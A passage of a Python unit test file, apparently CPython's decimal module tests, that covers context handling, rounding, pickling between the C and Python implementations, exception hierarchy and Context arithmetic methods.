self.assertEqual(str(x.ln(context=None)), '4.709530')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).ln, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.log10(context=None)), '2.045323')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).log10, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.logb(context=None)), '2')
self.assertRaises(DivisionByZero, Decimal(0).logb, context=None)
self.assertTrue(c.flags[DivisionByZero])
c.clear_flags()
self.assertEqual(str(x.logical_invert(context=None)), '1111000')
self.assertRaises(InvalidOperation, y.logical_invert, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_minus(context=None)), '9.999999E+999')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_minus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_plus(context=None)), 'Infinity')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_plus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(z.normalize(context=None)), '0')
self.assertRaises(Overflow, y.normalize, context=None)
self.assertTrue(c.flags[Overflow])
self.assertEqual(str(z.number_class(context=None)), '+Subnormal')
c.clear_flags()
self.assertEqual(str(z.sqrt(context=None)), '0E-1005')
self.assertTrue(c.flags[Clamped])
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
self.assertTrue(c.flags[Subnormal])
self.assertTrue(c.flags[Underflow])
c.clear_flags()
self.assertRaises(Overflow, y.sqrt, context=None)
self.assertTrue(c.flags[Overflow])
c.capitals = 0
self.assertEqual(str(z.to_eng_string(context=None)), '1e-9999')
c.capitals = 1
##### Binary functions
c.clear_flags()
ans = str(x.compare(Decimal('Nan891287828'), context=None))
self.assertEqual(ans, 'NaN1287828')
self.assertRaises(InvalidOperation, x.compare, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.compare_signal(8224, context=None))
self.assertEqual(ans, '-1')
self.assertRaises(InvalidOperation, x.compare_signal, Decimal('NaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_and(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.logical_and, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_or(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.logical_or, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_xor(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, x.logical_xor, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max_mag(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min_mag(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.remainder_near(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, y.remainder_near, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.rotate(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.rotate, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.scaleb(7, context=None))
self.assertEqual(ans, '1.11E+9')
self.assertRaises(InvalidOperation, x.scaleb, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.shift(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.shift, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
##### Ternary functions
c.clear_flags()
ans = str(x.fma(2, 3, context=None))
self.assertEqual(ans, '225')
self.assertRaises(Overflow, x.fma, Decimal('1e9999'), 3, context=None)
self.assertTrue(c.flags[Overflow])
##### Special cases
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_value(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_value, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_exact(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_exact, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_UP
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.501')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.500')
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=ROUND_UP, context=None))
self.assertEqual(ans, '1.501')
c.clear_flags()
self.assertRaises(InvalidOperation, y.quantize, Decimal('1e-10'), rounding=ROUND_UP, context=None)
self.assertTrue(c.flags[InvalidOperation])
with localcontext(Context()) as context:
context.prec = 7
context.Emax = 999
context.Emin = -999
with localcontext(ctx=None) as c:
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 999)
self.assertEqual(c.Emin, -999)
def test_conversions_from_int(self):
# Check that methods taking a second Decimal argument will
# always accept an integer in place of a Decimal.
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(4).compare(3),
Decimal(4).compare(Decimal(3)))
self.assertEqual(Decimal(4).compare_signal(3),
Decimal(4).compare_signal(Decimal(3)))
self.assertEqual(Decimal(4).compare_total(3),
Decimal(4).compare_total(Decimal(3)))
self.assertEqual(Decimal(4).compare_total_mag(3),
Decimal(4).compare_total_mag(Decimal(3)))
self.assertEqual(Decimal(10101).logical_and(1001),
Decimal(10101).logical_and(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_or(1001),
Decimal(10101).logical_or(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_xor(1001),
Decimal(10101).logical_xor(Decimal(1001)))
self.assertEqual(Decimal(567).max(123),
Decimal(567).max(Decimal(123)))
self.assertEqual(Decimal(567).max_mag(123),
Decimal(567).max_mag(Decimal(123)))
self.assertEqual(Decimal(567).min(123),
Decimal(567).min(Decimal(123)))
self.assertEqual(Decimal(567).min_mag(123),
Decimal(567).min_mag(Decimal(123)))
self.assertEqual(Decimal(567).next_toward(123),
Decimal(567).next_toward(Decimal(123)))
self.assertEqual(Decimal(1234).quantize(100),
Decimal(1234).quantize(Decimal(100)))
self.assertEqual(Decimal(768).remainder_near(1234),
Decimal(768).remainder_near(Decimal(1234)))
self.assertEqual(Decimal(123).rotate(1),
Decimal(123).rotate(Decimal(1)))
self.assertEqual(Decimal(1234).same_quantum(1000),
Decimal(1234).same_quantum(Decimal(1000)))
self.assertEqual(Decimal('9.123').scaleb(-100),
Decimal('9.123').scaleb(Decimal(-100)))
self.assertEqual(Decimal(456).shift(-1),
Decimal(456).shift(Decimal(-1)))
self.assertEqual(Decimal(-12).fma(Decimal(45), 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, Decimal(67)),
Decimal(-12).fma(Decimal(45), Decimal(67)))
class CUsabilityTest(UsabilityTest):
decimal = C
class PyUsabilityTest(UsabilityTest):
decimal = P
class PythonAPItests(unittest.TestCase):
def test_abc(self):
Decimal = self.decimal.Decimal
self.assertTrue(issubclass(Decimal, numbers.Number))
self.assertFalse(issubclass(Decimal, numbers.Real))
self.assertIsInstance(Decimal(0), numbers.Number)
self.assertNotIsInstance(Decimal(0), numbers.Real)
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
Decimal = self.decimal.Decimal
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
d = Decimal('-3.141590000')
p = pickle.dumps(d, proto)
e = pickle.loads(p)
self.assertEqual(d, e)
if C:
# Test interchangeability
x = C.Decimal('-3.123e81723')
y = P.Decimal('-3.123e81723')
sys.modules['decimal'] = C
sx = pickle.dumps(x, proto)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.Decimal)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y, proto)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.Decimal)
self.assertEqual(r, x)
x = C.Decimal('-3.123e81723').as_tuple()
y = P.Decimal('-3.123e81723').as_tuple()
sys.modules['decimal'] = C
sx = pickle.dumps(x, proto)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.DecimalTuple)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y, proto)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.DecimalTuple)
self.assertEqual(r, x)
sys.modules['decimal'] = savedecimal
def test_int(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(int(d)), r)
self.assertRaises(ValueError, int, Decimal('-nan'))
self.assertRaises(ValueError, int, Decimal('snan'))
self.assertRaises(OverflowError, int, Decimal('inf'))
self.assertRaises(OverflowError, int, Decimal('-inf'))
def test_trunc(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(math.trunc(d)), r)
def test_from_float(self):
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
def __init__(self, _):
self.x = 'y'
self.assertTrue(issubclass(MyDecimal, Decimal))
r = MyDecimal.from_float(0.1)
self.assertEqual(type(r), MyDecimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertEqual(r.x, 'y')
bigint = 12345678901234567890123456789
self.assertEqual(MyDecimal.from_float(bigint), MyDecimal(bigint))
self.assertTrue(MyDecimal.from_float(float('nan')).is_qnan())
self.assertTrue(MyDecimal.from_float(float('inf')).is_infinite())
self.assertTrue(MyDecimal.from_float(float('-inf')).is_infinite())
self.assertEqual(str(MyDecimal.from_float(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(MyDecimal.from_float(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(MyDecimal.from_float(float('-inf'))),
str(Decimal('-Infinity')))
self.assertRaises(TypeError, MyDecimal.from_float, 'abc')
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(MyDecimal.from_float(x))) # roundtrip
def test_create_decimal_from_float(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
context = Context(prec=5, rounding=ROUND_DOWN)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1415')
)
context = Context(prec=5, rounding=ROUND_UP)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1416')
)
context = Context(prec=5, traps=[Inexact])
self.assertRaises(
Inexact,
context.create_decimal_from_float,
math.pi
)
self.assertEqual(repr(context.create_decimal_from_float(-0.0)),
"Decimal('-0')")
self.assertEqual(repr(context.create_decimal_from_float(1.0)),
"Decimal('1')")
self.assertEqual(repr(context.create_decimal_from_float(10)),
"Decimal('10')")
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
c = Context(Emax=99999, Emin=-99999)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01')),
Decimal('7.34')
)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01'), rounding=ROUND_DOWN),
Decimal('7.33')
)
self.assertRaises(
InvalidOperation,
Decimal("10e99999").quantize, Decimal('1e100000'), context=c
)
c = Context()
d = Decimal("0.871831e800")
x = d.quantize(context=c, exp=Decimal("1e797"), rounding=ROUND_DOWN)
self.assertEqual(x, Decimal('8.71E+799'))
def test_complex(self):
Decimal = self.decimal.Decimal
x = Decimal("9.8182731e181273")
self.assertEqual(x.real, x)
self.assertEqual(x.imag, 0)
self.assertEqual(x.conjugate(), x)
x = Decimal("1")
self.assertEqual(complex(x), complex(float(1)))
self.assertRaises(AttributeError, setattr, x, 'real', 100)
self.assertRaises(AttributeError, setattr, x, 'imag', 100)
self.assertRaises(AttributeError, setattr, x, 'conjugate', 100)
self.assertRaises(AttributeError, setattr, x, '__complex__', 100)
def test_named_parameters(self):
D = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
Overflow = self.decimal.Overflow
xc = Context()
xc.prec = 1
xc.Emax = 1
xc.Emin = -1
with localcontext() as c:
c.clear_flags()
self.assertEqual(D(9, xc), 9)
self.assertEqual(D(9, context=xc), 9)
self.assertEqual(D(context=xc, value=9), 9)
self.assertEqual(D(context=xc), 0)
xc.clear_flags()
self.assertRaises(InvalidOperation, D, "xyz", context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
xc.clear_flags()
self.assertEqual(D(2).exp(context=xc), 7)
self.assertRaises(Overflow, D(8).exp, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
xc.clear_flags()
self.assertEqual(D(2).ln(context=xc), D('0.7'))
self.assertRaises(InvalidOperation, D(-1).ln, context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D(0).log10(context=xc), D('-inf'))
self.assertEqual(D(-1).next_minus(context=xc), -2)
self.assertEqual(D(-1).next_plus(context=xc), D('-0.9'))
self.assertEqual(D("9.73").normalize(context=xc), D('1E+1'))
self.assertEqual(D("9999").to_integral(context=xc), 9999)
self.assertEqual(D("-2000").to_integral_exact(context=xc), -2000)
self.assertEqual(D("123").to_integral_value(context=xc), 123)
self.assertEqual(D("0.0625").sqrt(context=xc), D('0.2'))
self.assertEqual(D("0.0625").compare(context=xc, other=3), -1)
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0").compare_signal, D('nan'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.2").max_mag(D('-0.3'), context=xc),
D('-0.3'))
self.assertEqual(D("0.02").min(D('-0.03'), context=xc), D('-0.0'))
self.assertEqual(D("0.02").min_mag(D('-0.03'), context=xc),
D('0.0'))
self.assertEqual(D("0.2").next_toward(D('-1'), context=xc), D('0.1'))
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0.2").quantize, D('1e10'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("9.99").remainder_near(D('1.5'), context=xc),
D('-0.5'))
self.assertEqual(D("9.9").fma(third=D('0.9'), context=xc, other=7),
D('7E+1'))
self.assertRaises(TypeError, D(1).is_canonical, context=xc)
self.assertRaises(TypeError, D(1).is_finite, context=xc)
self.assertRaises(TypeError, D(1).is_infinite, context=xc)
self.assertRaises(TypeError, D(1).is_nan, context=xc)
self.assertRaises(TypeError, D(1).is_qnan, context=xc)
self.assertRaises(TypeError, D(1).is_snan, context=xc)
self.assertRaises(TypeError, D(1).is_signed, context=xc)
self.assertRaises(TypeError, D(1).is_zero, context=xc)
self.assertFalse(D("0.01").is_normal(context=xc))
self.assertTrue(D("0.01").is_subnormal(context=xc))
self.assertRaises(TypeError, D(1).adjusted, context=xc)
self.assertRaises(TypeError, D(1).conjugate, context=xc)
self.assertRaises(TypeError, D(1).radix, context=xc)
self.assertEqual(D(-111).logb(context=xc), 2)
self.assertEqual(D(0).logical_invert(context=xc), 1)
self.assertEqual(D('0.01').number_class(context=xc), '+Subnormal')
self.assertEqual(D('0.21').to_eng_string(context=xc), '0.21')
self.assertEqual(D('11').logical_and(D('10'), context=xc), 0)
self.assertEqual(D('11').logical_or(D('10'), context=xc), 1)
self.assertEqual(D('01').logical_xor(D('10'), context=xc), 1)
self.assertEqual(D('23').rotate(1, context=xc), 3)
self.assertEqual(D('23').rotate(1, context=xc), 3)
xc.clear_flags()
self.assertRaises(Overflow,
D('23').scaleb, 1, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
self.assertEqual(D('23').shift(-1, context=xc), 0)
self.assertRaises(TypeError, D.from_float, 1.1, context=xc)
self.assertRaises(TypeError, D(0).as_tuple, context=xc)
self.assertEqual(D(1).canonical(), 1)
self.assertRaises(TypeError, D("-1").copy_abs, context=xc)
self.assertRaises(TypeError, D("-1").copy_negate, context=xc)
self.assertRaises(TypeError, D(1).canonical, context="x")
self.assertRaises(TypeError, D(1).canonical, xyz="x")
def test_exception_hierarchy(self):
decimal = self.decimal
DecimalException = decimal.DecimalException
InvalidOperation = decimal.InvalidOperation
FloatOperation = decimal.FloatOperation
DivisionByZero = decimal.DivisionByZero
Overflow = decimal.Overflow
Underflow = decimal.Underflow
Subnormal = decimal.Subnormal
Inexact = decimal.Inexact
Rounded = decimal.Rounded
Clamped = decimal.Clamped
self.assertTrue(issubclass(DecimalException, ArithmeticError))
self.assertTrue(issubclass(InvalidOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, TypeError))
self.assertTrue(issubclass(DivisionByZero, DecimalException))
self.assertTrue(issubclass(DivisionByZero, ZeroDivisionError))
self.assertTrue(issubclass(Overflow, Rounded))
self.assertTrue(issubclass(Overflow, Inexact))
self.assertTrue(issubclass(Overflow, DecimalException))
self.assertTrue(issubclass(Underflow, Inexact))
self.assertTrue(issubclass(Underflow, Rounded))
self.assertTrue(issubclass(Underflow, Subnormal))
self.assertTrue(issubclass(Underflow, DecimalException))
self.assertTrue(issubclass(Subnormal, DecimalException))
self.assertTrue(issubclass(Inexact, DecimalException))
self.assertTrue(issubclass(Rounded, DecimalException))
self.assertTrue(issubclass(Clamped, DecimalException))
self.assertTrue(issubclass(decimal.ConversionSyntax, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionImpossible, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, ZeroDivisionError))
self.assertTrue(issubclass(decimal.InvalidContext, InvalidOperation))
class CPythonAPItests(PythonAPItests):
decimal = C
class PyPythonAPItests(PythonAPItests):
decimal = P
class ContextAPItests(unittest.TestCase):
def test_none_args(self):
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
c1 = Context()
c2 = Context(prec=None, rounding=None, Emax=None, Emin=None,
capitals=None, clamp=None, flags=None, traps=None)
for c in [c1, c2]:
self.assertEqual(c.prec, 28)
self.assertEqual(c.rounding, ROUND_HALF_EVEN)
self.assertEqual(c.Emax, 999999)
self.assertEqual(c.Emin, -999999)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
assert_signals(self, c, 'flags', [])
assert_signals(self, c, 'traps', [InvalidOperation, DivisionByZero,
Overflow])
@cpython_only
def test_from_legacy_strings(self):
import _testcapi
c = self.decimal.Context()
for rnd in RoundingModes:
c.rounding = _testcapi.unicode_legacy_string(rnd)
self.assertEqual(c.rounding, rnd)
s = _testcapi.unicode_legacy_string('')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
s = _testcapi.unicode_legacy_string('ROUND_\x00UP')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
Context = self.decimal.Context
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
c = Context()
e = pickle.loads(pickle.dumps(c, proto))
self.assertEqual(c.prec, e.prec)
self.assertEqual(c.Emin, e.Emin)
self.assertEqual(c.Emax, e.Emax)
self.assertEqual(c.rounding, e.rounding)
self.assertEqual(c.capitals, e.capitals)
self.assertEqual(c.clamp, e.clamp)
self.assertEqual(c.flags, e.flags)
self.assertEqual(c.traps, e.traps)
# Test interchangeability
combinations = [(C, P), (P, C)] if C else [(P, P)]
for dumper, loader in combinations:
for ri, _ in enumerate(RoundingModes):
for fi, _ in enumerate(OrderedSignals[dumper]):
for ti, _ in enumerate(OrderedSignals[dumper]):
prec = random.randrange(1, 100)
emin = random.randrange(-100, 0)
emax = random.randrange(1, 100)
caps = random.randrange(2)
clamp = random.randrange(2)
# One module dumps
sys.modules['decimal'] = dumper
c = dumper.Context(
prec=prec, Emin=emin, Emax=emax,
rounding=RoundingModes[ri],
capitals=caps, clamp=clamp,
flags=OrderedSignals[dumper][:fi],
traps=OrderedSignals[dumper][:ti]
)
s = pickle.dumps(c, proto)
# The other module loads
sys.modules['decimal'] = loader
d = pickle.loads(s)
self.assertIsInstance(d, loader.Context)
self.assertEqual(d.prec, prec)
self.assertEqual(d.Emin, emin)
self.assertEqual(d.Emax, emax)
self.assertEqual(d.rounding, RoundingModes[ri])
self.assertEqual(d.capitals, caps)
self.assertEqual(d.clamp, clamp)
assert_signals(self, d, 'flags', OrderedSignals[loader][:fi])
assert_signals(self, d, 'traps', OrderedSignals[loader][:ti])
sys.modules['decimal'] = savedecimal
def test_equality_with_other_types(self):
Decimal = self.decimal.Decimal
self.assertIn(Decimal(10), ['a', 1.0, Decimal(10), (1,2), {}])
self.assertNotIn(Decimal(10), ['a', 1.0, (1,2), {}])
def test_copy(self):
# All copies should be deep
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy()
self.assertNotEqual(id(c), id(d))
self.assertNotEqual(id(c.flags), id(d.flags))
self.assertNotEqual(id(c.traps), id(d.traps))
k1 = set(c.flags.keys())
k2 = set(d.flags.keys())
self.assertEqual(k1, k2)
self.assertEqual(c.flags, d.flags)
def test__clamp(self):
# In Python 3.2, the private attribute `_clamp` was made
# public (issue 8540), with the old `_clamp` becoming a
# property wrapping `clamp`. For the duration of Python 3.2
# only, the attribute should be gettable/settable via both
# `clamp` and `_clamp`; in Python 3.3, `_clamp` should be
# removed.
Context = self.decimal.Context
c = Context()
self.assertRaises(AttributeError, getattr, c, '_clamp')
def test_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.abs(Decimal(-1))
self.assertEqual(c.abs(-1), d)
self.assertRaises(TypeError, c.abs, '-1')
def test_add(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.add(Decimal(1), Decimal(1))
self.assertEqual(c.add(1, 1), d)
self.assertEqual(c.add(Decimal(1), 1), d)
self.assertEqual(c.add(1, Decimal(1)), d)
self.assertRaises(TypeError, c.add, '1', 1)
self.assertRaises(TypeError, c.add, 1, '1')
def test_compare(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare(Decimal(1), Decimal(1))
self.assertEqual(c.compare(1, 1), d)
self.assertEqual(c.compare(Decimal(1), 1), d)
self.assertEqual(c.compare(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare, '1', 1)
self.assertRaises(TypeError, c.compare, 1, '1')
def test_compare_signal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_signal(Decimal(1), Decimal(1))
self.assertEqual(c.compare_signal(1, 1), d)
self.assertEqual(c.compare_signal(Decimal(1), 1), d)
self.assertEqual(c.compare_signal(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_signal, '1', 1)
self.assertRaises(TypeError, c.compare_signal, 1, '1')
def test_compare_total(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total(1, 1), d)
self.assertEqual(c.compare_total(Decimal(1), 1), d)
self.assertEqual(c.compare_total(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total, '1', 1)
self.assertRaises(TypeError, c.compare_total, 1, '1')
def test_compare_total_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total_mag(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total_mag(1, 1), d)
self.assertEqual(c.compare_total_mag(Decimal(1), 1), d)
self.assertEqual(c.compare_total_mag(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total_mag, '1', 1)
self.assertRaises(TypeError, c.compare_total_mag, 1, '1')
def test_copy_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_abs(Decimal(-1))
self.assertEqual(c.copy_abs(-1), d)
self.assertRaises(TypeError, c.copy_abs, '-1')
def test_copy_decimal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_decimal(Decimal(-1))
self.assertEqual(c.copy_decimal(-1), d)
self.assertRaises(TypeError, c.copy_decimal, '-1')
def test_copy_negate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_negate(Decimal(-1))
self.assertEqual(c.copy_negate(-1), d)
self.assertRaises(TypeError, c.copy_negate, '-1')
def test_copy_sign(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_sign(Decimal(1), Decimal(-2))
self.assertEqual(c.copy_sign(1, -2), d)
self.assertEqual(c.copy_sign(Decimal(1), -2), d)
self.assertEqual(c.copy_sign(1, Decimal(-2)), d)
self.assertRaises(TypeError, c.copy_sign, '1', -2)
self.assertRaises(TypeError, c.copy_sign, 1, '-2')
def test_divide(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide(Decimal(1), Decimal(2))
self.assertEqual(c.divide(1, 2), d)
self.assertEqual(c.divide(Decimal(1), 2), d)
self.assertEqual(c.divide(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide, '1', 2)
self.assertRaises(TypeError, c.divide, 1, '2')
def test_divide_int(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide_int(Decimal(1), Decimal(2))
self.assertEqual(c.divide_int(1, 2), d)
self.assertEqual(c.divide_int(Decimal(1), 2), d)
self.assertEqual(c.divide_int(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide_int, '1', 2)
self.assertRaises(TypeError, c.divide_int, 1, '2')
def test_divmod(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divmod(Decimal(1), Decimal(2))
self.assertEqual(c.divmod(1, 2), d)
self.assertEqual(c.divmod(Decimal(1), 2), d)
self.assertEqual(c.divmod(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divmod, '1', 2)
self.assertRaises(TypeError, c.divmod, 1, '2')
def test_exp(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.exp(Decimal(10))
self.assertEqual(c.exp(10), d)
self.assertRaises(TypeError, c.exp, '10')
def test_fma(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.fma(Decimal(2), Decimal(3), Decimal(4))
self.assertEqual(c.fma(2, 3, 4), d)
self.assertEqual(c.fma(Decimal(2), 3, 4), d)
self.assertEqual(c.fma(2, Decimal(3), 4), d)
self.assertEqual(c.fma(2, 3, Decimal(4)), d)
self.assertEqual(c.fma(Decimal(2), Decimal(3), 4), d)
self.assertRaises(TypeError, c.fma, '2', 3, 4)
self.assertRaises(TypeError, c.fma, 2, '3', 4)
self.assertRaises(TypeError, c.fma, 2, 3, '4')
